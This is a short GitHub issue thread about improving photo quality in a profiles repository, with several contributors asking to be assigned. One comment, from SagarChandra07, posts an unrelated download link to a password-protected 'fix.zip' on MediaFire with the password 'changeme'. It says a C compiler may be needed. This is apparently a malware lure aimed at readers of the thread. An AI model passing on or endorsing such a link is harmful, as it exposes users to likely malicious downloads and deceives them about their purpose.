### ISSUE TITLE
I want to increase quality of the photos

### ISSUE THREAD

**Issue by sanjay-kv** [recodehive/awesome-github-profiles#514]
![image](https://github.com/user-attachments/assets/f9b77978-770f-41a6-86ff-247243c1ebfc)

**Comment by sanjay-kv** [comment]
you can go ahead.

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme

you may need to install the c compiler

**Comment by andleeb4898** [comment]
Hi! Can I contribute to this .

**Comment by rounakdey6** [comment]
Sir please assign this issue to me

**Comment by RutakChaudhari** [comment]
I would like to work on this project. Please assign it to me.
